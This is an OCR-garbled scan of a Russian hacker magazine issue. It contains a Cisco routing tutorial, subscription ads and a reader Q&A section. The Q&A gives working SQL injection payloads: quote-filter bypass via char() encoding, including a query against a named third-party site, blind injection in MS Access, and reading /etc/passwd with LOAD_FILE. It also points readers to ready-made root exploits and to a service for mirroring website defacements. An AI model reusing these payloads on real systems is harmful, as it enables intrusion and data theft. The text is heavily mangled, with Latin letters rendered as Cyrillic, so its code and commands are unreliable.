но работать. Итак, на внешний интерфейс приходят запросы на порт 80. 
Наша циска перенаправляет полученные данные ѴѴеЬ-серверу, который 
стоит в БМ2. После обработки данных ѴѴеЬ-сервер начинает отвечать, 
и тут возникает большая проблема. Ответ попадает к циске, у которой 
беіаик гоіпе стоит І5Р1_СѴѴ — именно через этот шлюз она его и отправит. 
Если непонятно, в чем косяк, то представь ситуацию, когда ты спрашива- 
ешь у кого-то «как дела», а отвечает тебе совершенно другой, незнакомый 
человек. На незнакомца ты, естественно, внимания не обращаешь. Тут 
ситуация аналогична: запрос мы отправили на один ІР, а ответ пришел с 
какого-то совершенно левого. Исправлять будем с помощью Роіісу Вазесі 
Коийп^. Необходимо создать АСЬ, определяющий пакеты, которые долж- 
ны быть отправлены через канал второго провайдера: 

! Создаем расширенный ассезз-ІізС номер 100 

! Так как в расширенных листах нет отрицания, то перед 



разрешающими правилами пишем запрещающие 

сізсо (сопСід) #ассезз-1ізС 100 сіепу Сер ІюзС 10.10.20.2 

ед ѵллпл 192 . 168 . 1 . 0 0.0.0.255 

сізсо (сопСід) #ассезз-1ізС 100 сіепу Сер ко 8 С 10.10.20.2 
ед шт 192 . 168 . 3 . 0 0.0.0.255 

сізсо (сопСід) #ассезз-1ізС 100 регшіС Сер ЪозС 10.10.20.2 
ед ѵтѵі апу 

Первые два правила сіепу означают, что к пакетам, идущим от веб-серве- 
ра к локальным сетям, не будет применяться политика маршрутизации. 
А остальные пакеты попадут в политику ѴѴЕВ : 

сізсо (сопСід) #гоиСе-шар ШЕВ регшіС 10 

! Определяем область действия политики — только на адре- 
са, подпадающие под ассезз-ІізС 100 
сізсо (сопСід-гоиСе-шар) #таСск ір аскігезз 100 
сізсо (сопіід-гоиСе-шар) #зеС ір пехС-кор 172.17.0.1 

Директива таісЬ указывает, какие данные попадают под эту политику; 
команда «зеи ір пехі-Ьор» задает следующий Ьор. Для полного счастья ос- 



ХАКЕР 05 /1 25/ 09 



► 137 







Смотрим списки доступа и статистику по протоколу ІР 

талось сделать три очень простых действия. Во-первых, перенаправить 
данные из интернета к \УеЪ-серверу. Во-вторых, выполнить трансляцию 
ответов от ѴѴеЪ-сервера. В-третьих, применить политику маршрутиза- 
ции на интерфейсе, который смотрит в БМ2. 

Первое действие осуществляется в одну строчку: 



ичные 
компоновки 
Сізсо 105 



• ІР Ваге- - начальный уровень функциональности, включается 
во все другие «і еа+иге ге*г». Овеопечивает Базовый роутинг, 
то есть статические маршруты, ЕІР, 05РГ, ЕІСРР, только на ІРѵ4. 
Включает ѴІ_ АИ (802.1 0 и ІЗІ_) и МАТ. 

• ІРЗегѵісег (для ЬЗ свичей) -протоколы динамической марш- 
рутизации, ІЧАТ, ІР 5І_А. 

• Асіѵапсе ІР Зегѵісег - довавляется поддержка ІРѵб. 

• ІР Ѵоісе - довавляет функциональность ѴоІР и ѴоГР. 

• Асіѵапсе Зесигі^у - довавляется 105/ГігеѵаІІ, ЮЗ, 35Н и ІРЗес 
(0Е5, 30Е5 и АЕ5). 

• Зегѵісе РгоѵИег Зегѵісев - довавляется ІРѵб, ІЧе-Шоѵ/, 55Н, 
ВОР, АТМ и ѴоАТМ. 

• Еп^егргіве Ваге - довавляется поддержка протоколов ІРХ и 
АррІеТаІк. Также включаются ІВМ ■Геа^игег типа С'І_3\/+, 5Т0М/ 
ВЗТІЛЧиРЗРВ. 



сізсо (сопВід) #ір паВ іпзібе зоигсе зВаВіс Сер _отеЪ_ 
зегѵег_ір_ 80 ххх . ххх . ххх . ххх 80 ехВепбаЫе 

Второе также не отличается особой сложностью: 

сізсо (сопВід) #ір паВ іпзібе зоигсе ІізВ 100 іпВегВасе 
БіаІегО оѵегіоаб 

Напоминаю, что имя внешнего интерфейса — ОіаІегО, и что на нем необ- 
ходимо сделать «ір паі: ошзіеіе», иначе 105 не будет НАТ'ить данные. 
Третьим действием применяем политику маршрутизации: 

сізсо (сопВід) #іпВ ѵіап 5 

сізсо (сопВід-іВ) #ір роіісу гоиВе-тар ШЕВ 

В принципе, на этом можно было бы закончить настройку нашего боево- 
го роутера, если бы не его возможности по работе БН5 и БНСР. 

НАСТРОЙКА ЦИСКИ В КАЧЕСТВЕ РЫБ И 0НСР СЕРВЕРА Вообще 
говоря, оборудование Сізсо ориентировано на маршрутизацию и ком- 
мутацию данных в сетях, но никакие на работу в качестве Б^-сервера. 
Для этого лучше выделить отдельную машинку или использовать уже 
существующую. Я же покажу пример настройки сервера БП5 чисто в 
образовательных целях. Настройка сводится к указанию адресов вы- 
шестоящих БЫВ и, если нужно, созданию каких-либо внутренних зон. 
Ниже представлен пример настройки с комментариями: 

! Указываем ББЗ сервера провайдера 
сізсо (сопВід) #ір паше-зегѵег аЬс . аЬс . аЬс . аЬс 
сізсо (сопВід) #ір паше-зегѵег Ьса . Ьса . Ьса . Ьса 
! Включаем наш БЕГ8 сервак 
сізсо (сопВід) #ір бпз зегѵег 
! Создаем ргішагу зону ВезВ 

сізсо (сопВід) #ір сіпз ргішагу ВезВ зоа пз.ВезВ розВтазВег . ВезВ 
! Добавляем запись типа N3 
сізсо (сопВід) #ір Коз В ВезВ пз пз.ВезВ 
! Добавляем записи типа А 

сізсо (сопВід) #ір ВюзВ пз.ВезВ 192.168.1.254 
сізсо (сопВід) #ір ВюзВ апуіюзВ . ВезВ 192.168.1.250 

► 138 



БНСР также лучше вынести на отдельный сервер, но если нет такой 
возможности, воспользуемся встроенными средствами. Настраивать, 
по сути, необходимо пулы, которые привязываются к конкретным сетям 
командой пеіѵѵогк. Для каждого пула выставляются специфические 
настройки — адреса БЫЗ серверов, адрес дефолтного маршрута, ѴѴШ8 
сервера и т.д.: 

! Создаем первый пул 

сізсо (сопВід) #ір сДіср рооі РігзВРооІ 
! Указываем сеть 

сізсо (сДіср-сопВід) #пеВѵ\гогк 192.168.1.0 255.255.255.0 
! Специфические настройки 

сізсо (сДіср-сопВід) #беВаиІВ-гоиВег 192.168.1.254 
сізсо (сДіср-сопВід) #бпз- зегѵег 192.168.1.254 
сізсо (сДіср-сопВід) # бота іп -пате бошаіпі 
сізсо (сДіср-сопВід) #ехіВ 
! Создаем второй пул 

сізсо (сопВід) #ір сДіср рооі ЗесопбРооІ 
! Указываем сеть 

сізсо (сйіср-сопВід) #пеВѵгогк 192.168.3.0 255.255.255.0 

! Специфические настройки 

сізсо (сДіср-сопВід) #бошаіп-паше бошаіп2 

сізсо (сДіср-сопВід) #беВаиІВ-гоиВег 192 .168.3.2 

сізсо (сДіср-сопВід) #с!пз-зегѵег 192.168.3.2 

сізсо (сДіср-сопВід) #ехіВ 

! Указываем, какие адреса БНСР не будет присваивать кли- 
ентам 

сізсо (сопВід) #ір сДіср ехсіибеб-абсігезз 192.168.1.200 
192.168.1.254 

сізсо (сопВід) #ір сДіср ехсіибеб-абсігезз 192 . 168 .3.1 
192.168.3.10 

Мне кажется, настройка БНСР — довольно прозрачная процедура, и 
вопросов тут быть не должно. А если они и возникнут, то в официальной 
документации есть хорошие примеры с объяснениями. 

УДАЧИ! Конечно, в рамках одной статьи нереально раскрыть все тон- 
кости работы с дисками, ноя надеюсь, что мне удалось показать, что не 
так страшен черт, как его малюют. Главное в этом деле — практика, т 
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ПОДПИШИСЬ і одп " с,<а - 



Выгода «Гарантия «Сервис 



ѵѵѵѵѵѵ.діс.ги 



ё 

ой 

< 



автомобилей сагтизіс 




6 мес. 594, 00 руб. 
12 мес. 1056,00 руб. 




6 мес. 653, 40 руб. 
2мк. 1188,00 руб. 



ШОРСПШ 




6 мес. 415, 80 руб. 
1 2 мес. 778, 80 руб. 



оиохРЕРт Т^З 




6 мес. 1080,00 руб. 
1 2 мес. 1 960, 00 руб. 



6 мес. 653, 40 руб. 

1 2 ^§С|\и163'Рі фф, ЙГйбруб. 






6 мес. 2400, 00 руб. 6 мес. 1 300, 00 руб. 

1 2 мес. 4400, 00 руб. 1 2 мес. 2300, 00 руб. 



ОідіІаІРИоіо 



§ 

е 



б мес. 950, 40 руб. 
12 мес. 1716,00 руб. 




фслмр 

МАСТЕРСКАЯ 








б мес. 653, 40 руб. б мес. 670, 00 руб. 

1 2 мес . 1188,00руб. 12мес. 1230,00руб. 



О 

х 

х 

22 



РУР 




б мес. 1200, 00 руб. 
12 мес. 2200,00 руб. 




вышипаю#** 

“крестиком 




ШооМ 




6 мес. 670, 00 руб. 
12 мес. 1220,00 руб. 






4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



зкразз 




4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



Мошііаві 

Віке 




6 мес. 534, 60 руб. 
12 мес. 990,00 руб. 




КОМПЛЕКТЫ: 




б мес. 2100,00 руб. 
12 мес. 3720,00 руб. 



б мес. 3150,00 руб. 
1 2 мес. 5580, 60 руб. 



(дате)ІаіШ 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 



















^ меня постоянно не компилируются экплои- 
ты дляйолучения гооі-прав на *піх-серверах, 
выдавая всевЬзможные ошибки. Может, где-то 
уже есть готовые юзапускусплоиты? 

А: Думаю, не стоит гофрить, что сплоит, 
скомпилированный наѴгоронней машине, 
с большой вероятностьютиожет не выпол- 
ниться на нужном сервере\а что еще хуже 
— и вовсе «подвесит» систему или вызовет 
кегпеі рапіс (хотя то же самое возможно, даже 
если ты скомпилил эксп на самом сервере]. 
Поэтому всегда полезно читать комментарии 
автора эксплоита, оставленные в исходнике. 
Если на все вышесказанное/тебе забить, то 
смелотопай по адресу Ьир://ізЬоо1:ег.Ьѵ.ги/ 
хрі . Там ты найдешь та кие известные сплои- 
ты, как Ьгк, ЬООІузЫЕ рітасе, тгетар, гаріюг и 
многие другие. Само собой, все эти отмычки 
ты должен использовать только на своем 
сервере :]. 

О: Существует ли возможность быстро, програм- 
ме средствами уничтожить содержимое 
жесткого диска в экстренных ситуациях? 

А: На практике сам я еще не ирьіувщал/Ткр су- 



ываемый Оа 





ІМике 



— система для быстрого удаления информации 
с жестких дисков. Записываешь ізо’ш ник на СИ 
или біорру, вставляешь при следующей загрузке 
в дисковод — и все. Есть возможность выбрать: 
создавать та кой диекдля стирания ѴѴіпбоѵѵз- 
систем или Еіпих. 

О: Пишу Бесигііу-анализатор рИр-скриптов, 
можешь подсказать примеры уже составленных 
регулярокдля поиска известных багов? 

А: Подобный сканер написан командой асіб гооі: 

— и, соответственно, примеры их регэкспов: 

• /іореп$зрасе\ ( ( . * ) $изегс!аЦ ( . * ) \ ) /і 
• /таі1$зрасе\ ( ( . * ) $изегйаЦ ( . * ) \ ) /і 

• /\<\?\=$зрасе ( . * ) $изегс!аЦ/і 

Смотри скрипты на диске. 

О: Скопился целый ряд вопросов ПО БЦІ-ИНЪ- 
екциям. Начнем по порядку. Есть стандартная 
зці-іпіесііоп, подобрал количество столбцов, но 
когда делаю ипіоп зеіесі, сервер выдает «N01 
АссерІаЫе». 

А: Скорее всего, есть фильтрация. Попробуй 
что-нибудь вроде ПпІоЫ ЗеИЕсІ . 



0 : Что делать, если вместо вывода нужных по- 
лей получаю Шедаі тіх оТ соііаііопз Тог орегаііоп 

чжюм? 

А: Разные кодировки, при этом в ошибке не 
указано название нужной нам. Если доступны 
исходники этого скрипта (стз), то смотри, 
какая кодировка используется в базе данных. 
Структура создаваемых при инсталляции 
таблиц находится в файле *.зц 1(і пг1;а Ц.зц I, 
{стзпатеі.зці и т.п.]. К примеру, содержимое 
может быть та ким: 

ТаЫе зСгисСиге іог СаЫе ’изегз' 
СКЕАТЕ ТАВЬЕ ІЕ ЮТ ЕХІ8ТЗ ’изегз' ( 

' иісі 1 іпС ( 8 ) ГОТ ШЪЬ 
АІІТО_ІЫСКЕМЕЫТ , 

1 раз з ' ѵагсЬаг (30) СОЬЬАТЕ 
1аСіп1_депега1_сі БЕГАШГ ШЬЬ, 

) ЕШШЕ=МуІ5АМ ББЕАТТЬТ 
СНАК8ЕТ=1аСіп1 СОЕЬАТЕ=1аЦіп1_ 
депега1_сі АІІТО-ШСКЕМЕЖ^Ю ; 

Нужная нам кодировка — Іабпі , конечный запрос: 
ТюзС/зсгірС .рЪ.р?іс1=10 ипіоп зеІесС 1,2, 
сопѵегС (разз изіпд ІаСіпІ) ігош изегз 






0: Для определения таблиц в М5 501. делаю 
запрос «Нир://Нов(/всгір1.сТт?АиІГіог_ІО=9 
ог 1=(5ЕІ_ЕСТТ0Р 1 ТАВЬЕ_МАМЕ РВОМ 
НР0ВМАТІ0М_5СНЕМА.ТАВ1_Е5ѴѴНЕВЕТАВІ_Е_ 
ЫАМЕ ЫОТ ІЫ (Чодіпв’))--», но вместо названия 
следующей таблицы получаю сообщение об 
ошибке в синтаксисе. 

А: Включена фильтрация кавычек. Для 
обхода этого ограничения «чарим» (функция 
сЬаг(А5СІІ-код_символа]] каждый символ и 
объединяем с помощью оператора конкатена- 
ции в М55дІ — «+». Получаем строку вроде сЬ 
аг(108)+сбаг(1 1 1 )+сЬаг(103]+сЬаг(105]+сЬаг(1 1 
0]+сбаг(1 1 5]. Но если выполнить запрос, то мы 
также получим синтаксическую ошибку, так как 
символ «+» в гет-запросах воспринимается как 
пробел. Поэтому переводим его с помощью лю- 
бой II гі Епсобіпд/Оесобіпд утилиты взначение 
%2В. В итоге, запрос принимает вид: 

ЬЬЬр : //Іосаісагеегз . сот/зеекегз/ 
агЬісІез/ргоЬіІе . сЬт?АиЬЬог_1Б=9 
ог 1 = ( ЗЕЬЕСТ ТОР 1 ТАВЬЕ_ЫАМЕ ЕКОМ 
ШЕОВМАТІ(Ж_ЗСНЕМА . ТАВЬЕЗ ШЕКЕ 
ТАВЬЕ_ЫАМЕ ЮТ Ш (сЬаг ( 108 ) %2ВсЬаг 
(111) %2ВсЬаг (103) %2ВсЬаг (105) %2ВсЬ 
аг (110) %2ВсЬаг (115) ) ) -- 

В тексте ошибки будет присутствовать название 
сл е ду ю ще й та бл и цы 

0: Как провести ЫіпсІ вці-инъекцию 
в МБ Ассезз? 

А: Отличия от слепой инъекции в Му50І_ только 
в названияхфункций, принципы одинаковые. 
Для примера, есть хост с данной багой, вывод, 
соответственно, отсутствует: 

ЬЬЬр : //ЬозЬ/зсгірЬ . азр?ІБ=1 ' 

Сравниваем А5СІ 1-код первого символа строки, 
выдаваемого подзапросом: 

ЬЬЬр : //ЬозЬ/зсгірЬ . азр?ІБ=1 апсі 
1=ІІЕ (азе (шісі( (зеІесЬ ІазЬ (ІІзегІБ) 
Ьгот изегз) ,1,1) ) =104, 1,0) 

Если код совпадает, то функция НЕ возвращает 
1 и логическое выражение«1 апсі 1=1» верно -> 
происходит за грузка динамического содержи- 
мого сайта. Если совпадения не происходит, то, 
как правило, загружается только шаблон сайта. 




3 н а ч ит, п одета в л я е м д ру го й АЗ С 1 1 - код и т. д . 
Справка по функциям М5 Ассезз расположена 
здесь — ЬНр ://ѵѵѵѵѵѵ1есЬоЩЬ епеЕ сот/а ссезз/ 
Іипсііопз/іпсіех аІрЬа.рбр . 

0: Есть обычная инъекция, но при этом БіХББ не 
выполняется. Что может быть не так? Сервер 
выдает «ѴУагпіпд:тузцІ_ТеІсГі_аггау():8иррІіесІ 
агдитепі ів поі а ѵаіісі Му50І_ гезиК гезоигее...». 

А: Используй 16-ричныезначения символов. 
Если мы хотим получить простой алерт на выхо- 
де, то строка <5сгір1:>а Іе гі(] </зсгі р!> в Ьех будет 
выглядеть так: 0хЗС73б372 697 0743Еб1бСб5 
72742 82 93С2Р73 6372 697 0743Е, и конечный 
запрос -1 ипіоп зеІесЬ 1,2,0x30736372 
6970743Е616С65727428293С2Р73637269 
70743Е. 

0: Что за техника 50І.-іпіесІіоп тогеі гоѵѵ? 

А: В журнале (ПЕ # 111) не так давно была 
статья на тему раскручивания сложных ЫіпсІ 
здІ-іщесЬоп без использования ЬепсЬтагк. 
Вкратце опишу, о чем идет речь. Какты 
понимаешь, использование ЬепсЬтагк’а 
довольно неудобно. Нагрузка на сервер 
(может вообще «положить» слабый сервер 
на некоторое время!), длительное вы- 
полнение конечного эксплоита, подбор 
параметров для функции ЬепсЬтагк — все 
это зачастую отбивает желание надломать 
таргет-хост. Но был найден альтернативный 
способ — провокация запроса. Как обычно, 
пример: 

зсгірЬ .рЬр?ѵи1= ' апсі 1= (ЗЕЬЕСТ 1 
ІЖІОЫ ЗЕЬЕСТ 2 ) 

Конечноже, мы получим ошибку «тузд1_ 
диегу ( ) : ЗиЪдиегу геЬигпз тоге Ыіап 1 
гом», так как подзапрос возвращает две строки. 
Таким образом, мы можем организовать посим- 
вольный перебор, каки при стандартной ЫіпсІ 
зді-іщесбоп, но в качестве одного из возможных 
значений возвращаемыхфункцией ІЕ() сделать 
(ЗЕЬЕСТ 1 ШІОЫ ЗЕЬЕСТ 2) . 

0: Исследовал один движок. В исходниках явно 
видна возможность инжектирования вці-опера- 
торов, но в итоге, ничего не происходит, хотя баг 
есть 100%! 

А: Видимо, РНР натвоем сервере не настроен 
на показошибок, либо включены магические 




кавычки. Проверь следующие параметры в рбр. 

ІПІ : 

тадіс_диоЬез=0ЕЕ # в СРС-запросах 
отключаем магические кавычки; 
еггог_герогЬіпд=Е_АЬЬ # показ оши- 
бок; 

тузді . Ьгасе_тосіе=ОЫ # включен показ 
ошибок «мускула» . 

0: Не могу понять, как через слепую инъекцию 
можно просматривать файлы на сервере? 

А: Есть файл Мс/разгѵѵсІ, его начало: 
гооЬ : х : 0 : 0 : гооЬ : /гооЬ : /Ъіп/ЪазЬ 
Ып : х : 1 : 1 : Ып : /Ып : /зЬіп/поІодіп 
Первый символ Т', егоазсіі-код— 114, смотрим: 
ЬЬЬр : //ЬозЬ/зсгірЬ . рЬр?ѵи1=1 1 апб 
азсіі ( зиЬзЬгіпд ( (ЬОАЬ_ЕІЬЕ ( 1 /еЬс/ 
раззмб 1 )) , 1 , 1) ) =111 ничего не загру- 
жается; 

ЬЬЬр : //ЬозЬ/зсгірЬ .рЬр?ѵи1=1 1 апб 
азсіі ( зиЬзЬгіпд ( (ЬОАЬ_ЕІЬЕ ( 1 /еЬс/ 
раззмб 1 ) ) , 1 , 1 ) ) =114 -> загружается 
контент; 

ЬЬЬр : //ЬозЬ/зсгірЬ .рЬр?ѵи1=1 1 апсі 
азсіі ( зиЬзЬгіпд ( (ЬОАЬ_ЕІЬЕ ( 1 /еЬс/ 
раззмб 1 ) ) ,1,1)) ЪеЪмееп 110 апсі 115 
-> загружается контент. 

Перенос строки в АЗСІІ — 10. Конецстроки — 13. 
Все манипуляции также можно проводить в 
НЕХ’е. Дли ну да иных определяем с помощью 
функции ІепдіЫ 

ЬЬЬр : //ЬозЬ/зсгірЬ .рЬр?ѵи1=1 ' апб 
зиЬзЬгіпд ( ІепдЬЬ (ЬОАЬ_ЕІЬЕ ( ' /еЬс/ 
раззмб' ) ) , 1 , 1) = 1 4 

ЬЬЬр : / /ЬозЬ/зсгірЬ . рЬр?ѵи1 = 1 ' апсі 
зиЬзЬгіпд ( ІепдЬЬ (ЬОАЬ_ЕІЬЕ ( ' /еЬс/ 
раззмб ' ) ) , 2 , 1 ) = ' 8 

Так, мы можем посимвольно прочесть какие- 
либо конфиги с паролями внутри. Метод крайне 
неудобный и долгий, логи распухнут до немалых 
размеров, но, если другого выхода нет, то выби- 
рать не приходится. 

Аналогично можно использовать т1о_оиЫ1е, 
записав произвольные данные в файл (не забы- 
вай, что может помешать фильтрация кавычек, 
и необходимы права для записи + полный путь к 
директории). 

Пример эксплоита, использующего ІоасНіІе — 

М ЬЬ р ://т і ІѵѵО гт . со т/ех р Іо і Ьз/5 639 . А5СІІ таблицу 
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можно посмотреть здесь: ЫТрУ/доазсіі.сот 



О: Я^аіГи не понял, какс помощью РКОСЕОІШЕ 
&ЫА1_У5Е() получить названия таблиц и колонок. 
Можешь показать на практике? 

А: Полагаю, уже многие наслышаны о новом ме- 
тоде, но на практике мало что удается получить 
с помощью этой процедуры, так какслишком 
многое за висит оттого, как выводит данные 
из базы уязвимый сценарий. В большинстве 
случаев мы либо вообще неувидим вывода, 
либоувидим всевозможные ошибки. Однажды 
Му50І_ выплюнул мне целый рядошибок, втекс- 
те которых были указаны столбцы: 




КУ 



Шагпіпд: тузд1_гези11: ( ) [ іипсЪіоп . 
тузді-гезиіі:] : ЫАМЕ поЪ іоипсі іп 
МуЗОЬ гезиШ іпсіех 19 іп /ѵаг /ѵѵѵѵѵѵ/ 
ѵігЪиаІ/іюзІ: . сот/кЪсіосз/пеѵѵз/пеѵѵз . 
ркр оп Ііпе 19 

Шагпіпд: тузд1_гезиІС ( ) [ іипсЪіоп . 
тузді-гезиіі:] : ЪОСШ поС іоипсі іп 
МуЗОЬ гезиіі іпсіех 19 іп /ѵаг/ѵѵѵѵѵѵ/ 
ѵігРиаІ/іюзі . сот/ЬРсІосз/пеѵѵз/пеѵѵз . 
ркр оп Ііпе 21 



Теперь на примере. Есть инъекция с выводом 
первого столбца — ЬЕЕр: / /ІюзЕ/зсгірЕ . 
рЬ.р?ѵи1 = 1 ипіоп зеІесС 1 ,2,3. Смот- 
ри м ТЩЦр : / /іюзД/зсгірЦ . рЬр?ѵи1=1 
РКОСЕВШЕ АЫАЬУЗЕО -> зопаз_ 
сііаік . агкісіе . СіСІе. 

Здесь]опа5_сЬаІк — имя текущей БД, агбсіе 

— таблица, из которой идет выборка изна- 
чально, ШТе — первый столбец. 

Получаем второй столбец с помощью Іітіі: 

— ТШСр : / /іюзС/зсгірС . ркр?ѵи1=1 
Іітіі: 1 , 1 РКОСЕОШЕ АЫАЬУЗЕ ( ) - > 

д опаз_с1іа1к . агЪісІе.диезБоп. Изменяя 
значение первого аргумента Іітіі, получаем 
все столбцы. 

Для тех, кто не понял — мы можем получить 
название и столбцы только той таблицы, отку- 
да идет выборка изначально. Более подроб- 
ную информацию можно посмотреть в блоге 
«первооткрывателя» метода — ргадтаік. 
деек5допеѵѵіШ.іпЬ/2009/0іЛо-іЬе-[іті1:-апсІ- 
Ьеѵопб.ЫтІ . 



0: По каким ключевым словам в тексте А5Р- 
приложений стоит искать потенциальные Х55- 
уязвимости? 

А: Если в РНР мы обращаем внимание на 
переменные, выводимые с помощью ргіпі/есЬо, 
то в А5Р следует обратить внимание на участки 
кода с ключевыми словами Резропзе, «<%=», 
РедиезЕ 




( 



О 




0: Объясните ситуацию. На телефоне я уже 
давно использую Орега Міпі для серфинга, но с 
такой проб)іе^іой (илидаже правильнее сказать 
— багой) столкнулся в первый раз. Перейдя как- 
то на стартовую страницу Соодіе, обнаружил, 
что система распознала меня как некоторого 
пользователя. Перейдя в Стаіі, увидел, что я 
авторизирован и там. Какэто могло произойти? 
Неужели такая недоработка со стороны коман- 
ды Орега? В качестве устройства использова- 
лась версия для ѴѴіпсІоѵѵз МоЬіІе. 

А: Это достаточно известный баг, причем 
вовсе не разработчиков Орега. Вспомни, как 
ты устанавливал Орега Міпі? Скорее всего, 
не из оригинального ]аг-файла, а с помощью 
готовой сборки из .саб. Это все объясняет. 
Инсталлировать да г- файлы на ѴѴМ не очень 
удобно, ктомуже пользователи сталкивают- 
ся стем, что установленный эмулятор Іаѵа 
часто оказывается старой версии. Чтобы 
облегчить жизнь пользователям, энтузиасты 
создают стандартные для таких систем уста- 
новочные .саЬ-файлы, в которых включают 
предустановленный эмулятор Іаѵа. В итоге, 
установка проходит в несколько кликов, и 
мы получаем 9аѵа-приложение и платформу 
для запуска на своем ѴѴМ-девайсе. В чем 
же подвох? В том, что для устройства при 
первом запуске Орега Міпі генерируется 
свой идентификационный код, по которому 
в дальнейшем прокси-сервер (ускоритель и 
сжималка трафика] Оперы «узнает» телефон. 
Баг в том, что такой сгенерированный код 
вместе с эмулятором попал и в используе- 
мую для установки сборку. А поскольку ею 
воспользовался не только ты, нет ничего 
удивительного, что для сервера Орега Міпі 
вы являетесь одним и тем же пользователем. 
С одинаковыми кукисами. 



0: Как посмотреть всех клиентов, которые в 
данный момент используют ѴѴіРі-сети? 

А: Способов несколько: 

1. Если есть доступ к админке точки доступа, то 
практически на любой прошивке девайса есть 
вкладка со всеми текущими подключениями, 
где отображается МАО. 

2. На АР практически всегда используется 
ОНСР-сервер, который выдает клиентам ІР-ад- 
реса из определенного диапазона. Достаточно 
просканироватьлюбым сканером (Апдгу ІР 
Бсаппег. ѵѵѵѵѵѵ.апдгѵгіЬег.сопп — к примеру] этот 
диапазон, чтобы определить «живые хосты». 

3. Замечательная программа кізтеі [ ѵѵѵѵѵѵ. 

теіѵѵігеіезг.пеі ] содержит такую функцию по 
умолчанию. 



0: Хочу сделать следующую вещь: чтобы при 
выделении слова в любом приложении можно 
было нажать на горячую клавишу — и это слово 
отправлялось в поисковик или онлайн-пере- 
водчик. Для примера, в Соодіе. Какэто проще 
всего реализовать (уж больно не хочется писать 
специальное приложение)? 

А: В такой ситуации сам Бог велел воспользо- 
ваться замечательной тулзой АиІоНоІкеу [ ѵѵѵѵѵѵ. 
аиіобоікеѵ.сот/боѵѵпіоаб ] для настройки горя- 
чих клавиш в системе. Послеустановки нужно 
создать новый файл *.абк, в котором будет 
располагаться текст нашего сценария : 



#ІпзЪа1ІКеуЬ(іНоок 
#Регзіз1:еп1: 
#НсЩкеуІп1:егѵа1 ,100 
ЗеЪКеуБеІау , -1 



0: Говорят, мобильные операторы запустили 
мобильный чат. Что это и как попробовать? 

А: Действительно, в апреле «главная тройка» 
операторов запустила, наконец-то, услугу 
«чат». Еще бы: у каждого, кто этим чатом 
может пользоваться, давно установлена 
мобильная аська. Почему бы не использовать 
стандартные возможности системы, тем бо- 
лее, бесплатно? До первого июля проводится 
бета-тестирование, поэтому платы никто с 
тебя не возьмет. Настройки можно найти на 
официальных сайтах операторов для своего 
региона. 



+ С : : 

{ 

Зепсі, л с 
Зіеер 50 

Кип, ЬЦЦр : //шт. доодіе . сот/ 
зеагск?д=%с1ірЬоагс1% 

ЕеЪигп 

} 



Все просто: этотсценарий использует перемен- 
ную %с Іі р Ь оа гсі % , в которой хранится содер- 
жание буфера обмена, и передаетего в боодіе 
ІЭРБ как пара метр для поиска. Кактолько скрипт 
создан, дважды кликни по нему — и втрее по- 
явится новая иконка (чтобы избавиться от нее, 
необходимо добавить директиву #І\ІоТгауІсоп в 
самое начала скрипта]. Выделяем в любом при- 
ложение нужное слово, жмем заветную комби- 
нацию клавиш <СітІ+5Ыі1:+С> и наблюдаем, как 
в новом окне браузера открывается страничка 
боодіе’а с нужным нам запросом. □С 
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ПРОЗРАЧНАЯ СИНХ- 
РОНИЗАЦИЯ ФАЙЛОВ 
ЧЕРЕЗ Р2Р-СЕТБ ДЛЯ 
ѴѴШ00ѴѴ5, МАО И ШУХ 



<нрі И^" < і і і і т гщ 



■Ш«ИИМІ Ш '■* 



г, 



-[/ I I РІ 

г і\і ик/ ѵ гѵ ь 



ЬНр:// \ѵѵлѵ.хпкср.ги 

дечмші н>* 

і п т 



ТѴ 4рфІл>ѵАі4яігпгтЧп и т н 



Н^іГ.МІТІ Ьгі і 



ПРАВИЛЬНОЕ СОЗДАНИЕ 
ЗЕРКАЛ ДЕФЕЙСА ИЛИ ПРОС- 
ТО КОПИИ НУЖНОЙ СТРАНИЦЫ 



ѴѴУАІ_А 



ѴѴѴѴѴѴ. ѴѴ II АІ_А. СОМ 



Рассказывая о сервисах для прозрачной синхронизации данных, мы 
всячески нахваливали ОгорЬох. Так вот, ѴѴиаІа — практически полный его 
аналог, но позволяет бесплатно получить намного больше, чем 2 Гб. Для 
хранения файлов хитрым способом применяются сами компьютеры поль- 
зователей, и чем больше ты готов выделить места для файлов из такой 
р2р-сети,тем больший объем для файлов получаешь в ѴѴиаІа. Причем, это 
продумано, надежно и безопасно! 




ВАСКІІРІІРІ_ 



ѴѴѴѴѴѴ.ВАСКІІРІІВІ..СОМ 



Всякий раз, когда нужно создать зеркало дефейса, приходится делать 
Іскриншот и заливать его на специальные хостинги. И все равно, найдутся 
те, кто попытается твой взлом оспорить! Чтобы расставить всеточки над 
і, зеркала для дефейсов нужно клепать правильно. Например, с помощью 
Ісервиса ЬаскирІ)ВІ_, который моментально делает полную копию страницы 
І(ЫппІ, сзз-разметка и картинки], размещает ее на своих серверах (без воз- 
можности редактирования) и выдает краткий линкдля просмотра. 
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ВИЗУАЛЬНЫМ 
ПРОЕКТИРОВЩИК 
ИНТЕРФЕЙСОВ ДЛЯ 
ВЕБ-СТРАНИЦ 



Онлайн-среда разработки для 45-программистов. ѴѴЬіІе ЮЕ задумы- 
валась каксредство, позволяющее визуально «накидать интерфейс» 
сначала для специфического фреймворка, а потом и для известных 
РгоЫуре^з, іОиегу, МооТооІз и ЕхУ5. Несмотря на то, что это всего лишь 
бета, уже сейчас вполне возможно создавать интерфейсы с помощью ви- 
зуального проектировщика и тутже править код вручную в 4аѵа5сгірІ/С55 
редакторе. 



5ІТЕ24Х7.СОМ 



Этот сервис окончательно убедил меня в том, что использовать отечест- 
венныехостинг-компании весьма чревато. Сомнения по поводу заявлен- 
ного провом аптайма я разрешил с помощью сервиса 5іІе24х7, который 
бесплатно мониторитлюбой сайти отправляетуведомление обупавшем 
серваке по5М5. Пару раз проснувшись оттаких сообщений, я надумал 
купитьдедикв Европе :). 
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А81І5 рекомендует ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит 




Ноутбуки А5І/8 Серии N. 
НАВСТРЕЧУ БУДУЩЕМУ 
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Новый ноутбук А81І5 N51 V, созданный на базе процессорной 
технологии ІпіеІ® Сепігіпо® 2, с предустановленной подлинной 
ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит, предлагает пользователям самые 
инновационные функции, технологии и эксклюзивный дизайн. 
Технология дает возможность использовать 

Зкуре™, слушать музыку, получать и отправлять сообщения 
электронной почты через веб-интерфейс или искать информацию в 
сети Іпіегпеі всего через 8 секунд* после включения ноутбука. 

